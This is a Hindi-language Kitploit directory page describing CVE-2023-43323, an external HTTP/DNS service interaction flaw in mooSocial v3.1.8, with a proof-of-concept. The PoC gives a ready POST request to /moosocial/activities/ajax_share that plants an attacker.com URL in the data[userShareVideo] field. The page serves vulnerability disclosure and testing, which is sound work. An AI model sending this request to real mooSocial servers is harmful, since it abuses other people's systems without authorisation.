Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-43323 — mooSocial v3.1.8 post function पर external service interaction के लिए संवेदनशील है। | Kitploit
उपकरण/GitHubGitHub/ahrixia/cve-2023-43323
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनाDNS विश्लेषण
GitHubahrixia/cve-2023-43323

CVE-2023-43323

mooSocial v3.1.8 post function पर external service interaction के लिए संवेदनशील है।

रिपॉजिटरी देखें
122 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

mooSocial: बाहरी HTTP और DNS सेवा इंटरैक्शन (CVE-2023-43323)

mooSocial v3.1.8 पोस्ट फ़ंक्शन पर बाहरी सेवा इंटरैक्शन के प्रति असुरक्षित है। निष्पादित होने पर, सर्वर बाहरी सर्वर को HTTP और DNS अनुरोध भेजता है।

असुरक्षित पैरामीटर: messageText, data[wall_photo], data[userShareVideo] और data[userShareLink]

एक्सप्लॉइट - प्रूफ ऑफ कॉन्सेप्ट (POC)

बाहरी HTTP और DNS सेवा इंटरैक्शन

root@kitploit:~
पेलोड : http://attacker.com/?null=

/moosocial/activities/ajax_share पर POST अनुरोध (केवल POST अनुरोध डेटा):

root@kitploit:~
[data%5Btype%5D=User&data%5Btarget_id%5D=0&data%5Baction%5D=wall_post&data%5Bwall_photo%5D=&data%5Bsubject_type%5D=&messageText=asas&data%5BuserShareLink%5D=&data%5BuserShareVideo%5D=http%3A%2F%2Fattacker.com%2F%3Fnull&data%5BuserTagging%5D=&data%5BshareImage%5D=1&data%5Bprivacy%5D=1]

छवि

टूल डाउनलोड करें